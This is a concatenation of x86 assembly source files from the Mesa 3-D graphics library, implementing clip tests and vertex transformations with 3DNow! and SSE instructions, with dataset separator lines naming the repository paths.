AND_B( CL, AH )
TEST_B( CL, CL )
MOV_B( CL, REGIND(EDX) )
JZ( LLBL(ctp4_proj) )
LLBL(ctp4_noproj):
FSTP( ST(0) ) /* */
MOV_L( CONST(0), DST0 )
MOV_L( CONST(0), DST1 )
MOV_L( CONST(0), DST2 )
MOV_L( CONST(0x3f800000), DST3 )
JMP( LLBL(ctp4_next) )
LLBL(ctp4_proj):
FLD_S( SRC0 ) /* F0 F3 */
FMUL2( ST(1), ST0 )
FLD_S( SRC1 ) /* F1 F0 F3 */
FMUL2( ST(2), ST0 )
FLD_S( SRC2 ) /* F2 F1 F0 F3 */
FMUL2( ST(3), ST0 )
FXCH( ST(2) ) /* F0 F1 F2 F3 */
FSTP_S( DST0 ) /* F1 F2 F3 */
FSTP_S( DST1 ) /* F2 F3 */
FSTP_S( DST2 ) /* F3 */
FSTP_S( DST3 ) /* */
LLBL(ctp4_next):
INC_L( EDX )
ADD_L( CONST(16), EDI )
ADD_L( ARG_SOURCE, ESI )
CMP_L( EDX, ARG_CLIP )
JNZ( LLBL(ctp4_top) )
MOV_L( ARG_OR, ECX )
MOV_L( ARG_AND, EDX )
MOV_B( AL, REGIND(ECX) )
MOV_B( AH, REGIND(EDX) )
LLBL(ctp4_finish):
MOV_L( ARG_DEST, EAX )
#ifdef ELFPIC
POP_L( ESI ) /* discard ptr to clip_table */
#endif
POP_L( EBX )
POP_L( EBP )
POP_L( EDI )
POP_L( ESI )
RET
ALIGNTEXT16
GLOBL GLNAME( _mesa_x86_cliptest_points4_np )
HIDDEN(_mesa_x86_cliptest_points4_np)
GLNAME( _mesa_x86_cliptest_points4_np ):
#ifdef ELFPIC
#define FRAME_OFFSET 20
#else
#define FRAME_OFFSET 16
#endif
PUSH_L( ESI )
PUSH_L( EDI )
PUSH_L( EBP )
PUSH_L( EBX )
#ifdef ELFPIC
/* store pointer to clip_table on stack */
CALL( LLBL(ctp4_np_get_eip) )
ADD_L( CONST(_GLOBAL_OFFSET_TABLE_), EBX )
MOV_L( REGOFF(clip_table@GOT, EBX), EBX )
PUSH_L( EBX )
JMP( LLBL(ctp4_np_clip_table_ready) )
LLBL(ctp4_np_get_eip):
/* store eip in ebx */
MOV_L( REGIND(ESP), EBX )
RET
LLBL(ctp4_np_clip_table_ready):
#endif
MOV_L( ARG_SOURCE, ESI )
/* slot */
MOV_L( ARG_CLIP, EDX )
MOV_L( ARG_OR, EBX )
MOV_L( ARG_AND, EBP )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( EAX, ARG_DEST ) /* put stride in ARG_DEST */
ADD_L( EDX, ECX )
MOV_L( ECX, EDI ) /* put clipmask + count in EDI */
CMP_L( ECX, EDX )
MOV_B( REGIND(EBX), AL )
MOV_B( REGIND(EBP), AH )
JZ( LLBL(ctp4_np_finish) )
ALIGNTEXT16
LLBL(ctp4_np_top):
MOV_L( SRC3, EBP )
MOV_L( SRC2, EBX )
XOR_L( ECX, ECX )
ADD_L( EBP, EBP ) /* ebp = abs(S(3))*2 ; carry = sign of S(3) */
ADC_L( ECX, ECX )
ADD_L( EBX, EBX ) /* ebx = abs(S(2))*2 ; carry = sign of S(2) */
ADC_L( ECX, ECX )
CMP_L( EBX, EBP ) /* carry = abs(S(2))*2 > abs(S(3))*2 */
ADC_L( ECX, ECX )
MOV_L( SRC1, EBX )
ADD_L( EBX, EBX ) /* ebx = abs(S(1))*2 ; carry = sign of S(1) */
ADC_L( ECX, ECX )
CMP_L( EBX, EBP ) /* carry = abs(S(1))*2 > abs(S(3))*2 */
ADC_L( ECX, ECX )
MOV_L( SRC0, EBX )
ADD_L( EBX, EBX ) /* ebx = abs(S(0))*2 ; carry = sign of S(0) */
ADC_L( ECX, ECX )
CMP_L( EBX, EBP ) /* carry = abs(S(0))*2 > abs(S(3))*2 */
ADC_L( ECX, ECX )
#ifdef ELFPIC
MOV_L( REGIND(ESP), EBP ) /* clip_table */
MOV_B( REGBI(EBP, ECX), CL )
#else
MOV_B( REGOFF(clip_table,ECX), CL )
#endif
OR_B( CL, AL )
AND_B( CL, AH )
TEST_B( CL, CL )
MOV_B( CL, REGIND(EDX) )
INC_L( EDX )
/* slot */
ADD_L( ARG_DEST, ESI )
CMP_L( EDX, EDI )
JNZ( LLBL(ctp4_np_top) )
MOV_L( ARG_OR, ECX )
MOV_L( ARG_AND, EDX )
MOV_B( AL, REGIND(ECX) )
MOV_B( AH, REGIND(EDX) )
LLBL(ctp4_np_finish):
MOV_L( ARG_SOURCE, EAX )
#ifdef ELFPIC
POP_L( ESI ) /* discard ptr to clip_table */
#endif
POP_L( EBX )
POP_L( EBP )
POP_L( EDI )
POP_L( ESI )
RET
#if defined (__ELF__) && defined (__linux__)
.section .note.GNU-stack,"",%progbits
#endif
|
AIFM-sys/AIFM
| 15,849
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/x86/3dnow_xform2.S
|
/* $Id: 3dnow_xform2.S,v 1.1.1.1 2012/03/29 17:22:10 uid42307 Exp $ */
/*
* Mesa 3-D graphics library
* Version: 3.5
*
* Copyright (C) 1999-2001 Brian Paul All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* BRIAN PAUL BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
* AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
#ifdef USE_3DNOW_ASM
#include "matypes.h"
#include "xform_args.h"
SEG_TEXT
#define FRAME_OFFSET 4
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points2_general )
HIDDEN(_mesa_3dnow_transform_points2_general)
GLNAME( _mesa_3dnow_transform_points2_general ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(4), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TPGR_3 ) )
MOVD ( REGIND(ECX), MM0 ) /* | m00 */
PUNPCKLDQ ( REGOFF(16, ECX), MM0 ) /* m10 | m00 */
MOVD ( REGOFF(4, ECX), MM1 ) /* | m01 */
PUNPCKLDQ ( REGOFF(20, ECX), MM1 ) /* m11 | m01 */
MOVD ( REGOFF(8, ECX), MM2 ) /* | m02 */
PUNPCKLDQ ( REGOFF(24, ECX), MM2 ) /* m12 | m02 */
MOVD ( REGOFF(12, ECX), MM3 ) /* | m03 */
PUNPCKLDQ ( REGOFF(28, ECX), MM3 ) /* m13 | m03 */
MOVQ ( REGOFF(48, ECX), MM4 ) /* m31 | m30 */
MOVQ ( REGOFF(56, ECX), MM5 ) /* m33 | m32 */
ALIGNTEXT16
LLBL( G3TPGR_2 ):
MOVQ ( REGIND(EAX), MM6 ) /* x1 | x0 */
MOVQ ( MM6, MM7 ) /* x1 | x0 */
PFMUL ( MM0, MM6 ) /* x1*m10 | x0*m00 */
PFMUL ( MM1, MM7 ) /* x1*m11 | x0*m01 */
PFACC ( MM7, MM6 ) /* x0*m01+x1*m11 | x0*x00+x1*m10 */
PFADD ( MM4, MM6 ) /* x0*...*m11+m31 | x0*...*m10+m30 */
MOVQ ( MM6, REGIND(EDX) ) /* write r1, r0 */
MOVQ ( REGIND(EAX), MM6 ) /* x1 | x0 */
MOVQ ( MM6, MM7 ) /* x1 | x0 */
PFMUL ( MM2, MM6 ) /* x1*m12 | x0*m02 */
PFMUL ( MM3, MM7 ) /* x1*m13 | x0*m03 */
ADD_L ( EDI, EAX ) /* next vertex */
PFACC ( MM7, MM6 ) /* x0*m03+x1*m13 | x0*x02+x1*m12 */
PFADD ( MM5, MM6 ) /* x0*...*m13+m33 | x0*...*m12+m32 */
MOVQ ( MM6, REGOFF(8, EDX) ) /* write r3, r2 */
ADD_L ( CONST(16), EDX ) /* next r */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TPGR_2 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TPGR_3 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points2_perspective )
HIDDEN(_mesa_3dnow_transform_points2_perspective)
GLNAME( _mesa_3dnow_transform_points2_perspective ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(4), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TPPR_3 ) )
MOVD ( REGIND(ECX), MM0 ) /* | m00 */
PUNPCKLDQ ( REGOFF(20, ECX), MM0 ) /* m11 | m00 */
MOVD ( REGOFF(56, ECX), MM3 ) /* | m32 */
ALIGNTEXT16
LLBL( G3TPPR_2 ):
MOVQ ( REGIND(EAX), MM4 ) /* x1 | x0 */
PFMUL ( MM0, MM4 ) /* x1*m11 | x0*m00 */
MOVQ ( MM4, REGIND(EDX) ) /* write r1, r0 */
MOVQ ( MM3, REGOFF(8, EDX) ) /* write r2 (=m32), r3 (=0) */
ADD_L ( EDI, EAX ) /* next vertex */
ADD_L ( CONST(16), EDX ) /* next r */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TPPR_2 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TPPR_3 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points2_3d )
HIDDEN(_mesa_3dnow_transform_points2_3d)
GLNAME( _mesa_3dnow_transform_points2_3d ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(3), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_3 ), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TP3R_3 ) )
MOVD ( REGIND(ECX), MM0 ) /* | m00 */
PUNPCKLDQ ( REGOFF(16, ECX), MM0 ) /* m10 | m00 */
MOVD ( REGOFF(4, ECX), MM1 ) /* | m01 */
PUNPCKLDQ ( REGOFF(20, ECX), MM1 ) /* m11 | m01 */
MOVD ( REGOFF(8, ECX), MM2 ) /* | m02 */
PUNPCKLDQ ( REGOFF(24, ECX), MM2 ) /* m12 | m02 */
MOVQ ( REGOFF(48, ECX), MM4 ) /* m31 | m30 */
MOVD ( REGOFF(56, ECX), MM5 ) /* | m32 */
ALIGNTEXT16
LLBL( G3TP3R_2 ):
MOVQ ( REGIND(EAX), MM6 ) /* x1 | x0 */
MOVQ ( MM6, MM7 ) /* x1 | x0 */
PFMUL ( MM0, MM6 ) /* x1*m10 | x0*m00 */
PFMUL ( MM1, MM7 ) /* x1*m11 | x0*m01 */
PFACC ( MM7, MM6 ) /* x0*m01+x1*m11 | x0*x00+x1*m10 */
PFADD ( MM4, MM6 ) /* x0*...*m11+m31 | x0*...*m10+m30 */
MOVQ ( MM6, REGIND(EDX) ) /* write r1, r0 */
MOVQ ( REGIND(EAX), MM6 ) /* x1 | x0 */
MOVQ ( MM6, MM7 ) /* x1 | x0 */
PFMUL ( MM2, MM6 ) /* x1*m12 | x0*m02 */
PFACC ( MM7, MM6 ) /* ***trash*** | x0*x02+x1*m12 */
PFADD ( MM5, MM6 ) /* ***trash*** | x0*...*m12+m32 */
MOVD ( MM6, REGOFF(8, EDX) ) /* write r2 */
ADD_L ( EDI, EAX ) /* next vertex */
ADD_L ( CONST(16), EDX ) /* next r */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TP3R_2 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TP3R_3 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points2_3d_no_rot )
HIDDEN(_mesa_3dnow_transform_points2_3d_no_rot)
GLNAME( _mesa_3dnow_transform_points2_3d_no_rot ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(3), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_3 ), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TP3NRR_3 ) )
MOVD ( REGIND(ECX), MM0 ) /* | m00 */
PUNPCKLDQ ( REGOFF(20, ECX), MM0 ) /* m11 | m00 */
MOVQ ( REGOFF(48, ECX), MM2 ) /* m31 | m30 */
MOVD ( REGOFF(56, ECX), MM3 ) /* | m32 */
ALIGNTEXT16
LLBL( G3TP3NRR_2 ):
MOVQ ( REGIND(EAX), MM4 ) /* x1 | x0 */
PFMUL ( MM0, MM4 ) /* x1*m11 | x0*m00 */
PFADD ( MM2, MM4 ) /* x1*m11+m31 | x0*m00+m30 */
MOVQ ( MM4, REGIND(EDX) ) /* write r1, r0 */
MOVD ( MM3, REGOFF(8, EDX) ) /* write r2 */
ADD_L ( EDI, EAX ) /* next vertex */
ADD_L ( CONST(16), EDX ) /* next r */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TP3NRR_2 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TP3NRR_3 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points2_2d )
HIDDEN(_mesa_3dnow_transform_points2_2d)
GLNAME( _mesa_3dnow_transform_points2_2d ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(2), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_2), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TP2R_3 ) )
MOVQ ( REGIND(ECX), MM0 ) /* m01 | m00 */
MOVQ ( REGOFF(16, ECX), MM1 ) /* m11 | m10 */
MOVQ ( REGOFF(48, ECX), MM2 ) /* m31 | m30 */
ALIGNTEXT16
LLBL( G3TP2R_2 ):
MOVD ( REGIND(EAX), MM4 ) /* | x0 */
MOVD ( REGOFF(4, EAX), MM5 ) /* | x1 */
PUNPCKLDQ ( MM4, MM4 ) /* x0 | x0 */
ADD_L ( EDI, EAX ) /* next vertex */
PFMUL ( MM0, MM4 ) /* x0*m01 | x0*m00 */
PUNPCKLDQ ( MM5, MM5 ) /* x1 | x1 */
PFMUL ( MM1, MM5 ) /* x1*m11 | x1*m10 */
PFADD ( MM2, MM4 ) /* x...x1*m11+31 | x0*..*m10+m30 */
PFADD ( MM5, MM4 ) /* x0*m01+x1*m11 | x0*m00+x1*m10 */
MOVQ ( MM4, REGIND(EDX) ) /* write r1, r0 */
ADD_L ( CONST(16), EDX ) /* next r */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TP2R_2 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TP2R_3 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points2_2d_no_rot )
HIDDEN(_mesa_3dnow_transform_points2_2d_no_rot)
GLNAME( _mesa_3dnow_transform_points2_2d_no_rot ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(2), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_2), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TP2NRR_3 ) )
MOVD ( REGIND(ECX), MM0 ) /* | m00 */
PUNPCKLDQ ( REGOFF(20, ECX), MM0 ) /* m11 | m00 */
MOVQ ( REGOFF(48, ECX), MM2 ) /* m31 | m30 */
ALIGNTEXT16
LLBL( G3TP2NRR_2 ):
MOVQ ( REGIND(EAX), MM4 ) /* x1 | x0 */
ADD_L ( EDI, EAX ) /* next vertex */
PFMUL ( MM0, MM4 ) /* x1*m11 | x0*m00 */
PFADD ( MM2, MM4 ) /* m31 | x0*m00+m30 */
MOVQ ( MM4, REGIND(EDX) ) /* write r1, r0 */
ADD_L ( CONST(16), EDX ) /* next r */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TP2NRR_2 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TP2NRR_3 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points2_identity )
HIDDEN(_mesa_3dnow_transform_points2_identity)
GLNAME( _mesa_3dnow_transform_points2_identity ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(2), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_2), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TPIR_3 ) )
ALIGNTEXT16
LLBL( G3TPIR_3 ):
MOVQ ( REGIND(EAX), MM0 ) /* x1 | x0 */
ADD_L ( EDI, EAX ) /* next vertex */
MOVQ ( MM0, REGIND(EDX) ) /* r1 | r0 */
ADD_L ( CONST(16), EDX ) /* next r */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TPIR_3 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TPIR_4 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
#endif
#if defined (__ELF__) && defined (__linux__)
.section .note.GNU-stack,"",%progbits
#endif
|
AIFM-sys/AIFM
| 13,357
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/x86/sse_xform1.S
|
/* $Id: sse_xform1.S,v 1.1.1.1 2012/03/29 17:22:10 uid42307 Exp $ */
/*
* Mesa 3-D graphics library
* Version: 3.5
*
* Copyright (C) 1999-2001 Brian Paul All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* BRIAN PAUL BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
* AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
/** TODO:
* - insert PREFETCH instructions to avoid cache-misses !
* - some more optimizations are possible...
* - for 40-50% more performance in the SSE-functions, the
* data (trans-matrix, src_vert, dst_vert) needs to be 16byte aligned !
*/
#ifdef USE_SSE_ASM
#include "matypes.h"
#include "xform_args.h"
SEG_TEXT
#define S(i) REGOFF(i * 4, ESI)
#define D(i) REGOFF(i * 4, EDI)
#define M(i) REGOFF(i * 4, EDX)
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points1_general)
HIDDEN( _mesa_sse_transform_points1_general )
GLNAME( _mesa_sse_transform_points1_general ):
#define FRAME_OFFSET 8
PUSH_L ( ESI )
PUSH_L ( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( ARG_MATRIX, EDX ) /* ptr to matrix */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
CMP_L( CONST(0), ECX ) /* count == 0 ? */
JE( LLBL(K_GTP1GR_finish) ) /* yes -> nothing to do. */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(4), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
MOVAPS( M(0), XMM0 ) /* m3 | m2 | m1 | m0 */
MOVAPS( M(12), XMM1 ) /* m15 | m14 | m13 | m12 */
ALIGNTEXT32
LLBL(K_GTP1GR_top):
MOVSS( S(0), XMM2 ) /* ox */
SHUFPS( CONST(0x0), XMM2, XMM2 ) /* ox | ox | ox | ox */
MULPS( XMM0, XMM2 ) /* ox*m3 | ox*m2 | ox*m1 | ox*m0 */
ADDPS( XMM1, XMM2 ) /* + | + | + | + */
MOVUPS( XMM2, D(0) )
LLBL(K_GTP1GR_skip):
ADD_L ( CONST(16), EDI )
ADD_L ( EAX, ESI )
CMP_L ( ECX, EDI )
JNE ( LLBL(K_GTP1GR_top) )
LLBL(K_GTP1GR_finish):
POP_L ( EDI )
POP_L ( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points1_identity)
HIDDEN(_mesa_sse_transform_points1_identity)
GLNAME( _mesa_sse_transform_points1_identity ):
#define FRAME_OFFSET 8
PUSH_L ( ESI )
PUSH_L ( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L( ECX, ECX)
JZ( LLBL(K_GTP1IR_finish) ) /* count was zero; go to finish */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_1), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(1), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
CMP_L( ESI, EDI )
JE( LLBL(K_GTP1IR_finish) )
ALIGNTEXT32
LLBL(K_GTP1IR_top):
MOV_L( S(0), EDX )
MOV_L( EDX, D(0) )
LLBL(K_GTP1IR_skip):
ADD_L ( CONST(16), EDI )
ADD_L ( EAX, ESI )
CMP_L ( ECX, EDI )
JNE ( LLBL(K_GTP1IR_top) )
LLBL(K_GTP1IR_finish):
POP_L ( EDI )
POP_L ( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points1_3d_no_rot)
HIDDEN(_mesa_sse_transform_points1_3d_no_rot)
GLNAME(_mesa_sse_transform_points1_3d_no_rot):
#define FRAME_OFFSET 8
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( ARG_MATRIX, EDX ) /* ptr to matrix */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L( ECX, ECX)
JZ( LLBL(K_GTP13DNRR_finish) ) /* count was zero; go to finish */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(3), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
MOVSS( M(0), XMM0 ) /* m0 */
MOVSS( M(12), XMM1 ) /* m12 */
MOVSS( M(13), XMM2 ) /* m13 */
MOVSS( M(14), XMM3 ) /* m14 */
ALIGNTEXT32
LLBL(K_GTP13DNRR_top):
MOVSS( S(0), XMM4 ) /* ox */
MULSS( XMM0, XMM4 ) /* ox*m0 */
ADDSS( XMM1, XMM4 ) /* ox*m0+m12 */
MOVSS( XMM4, D(0) )
MOVSS( XMM2, D(1) )
MOVSS( XMM3, D(2) )
LLBL(K_GTP13DNRR_skip):
ADD_L ( CONST(16), EDI )
ADD_L ( EAX, ESI )
CMP_L ( ECX, EDI )
JNE ( LLBL(K_GTP13DNRR_top) )
LLBL(K_GTP13DNRR_finish):
POP_L ( EDI )
POP_L ( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points1_perspective)
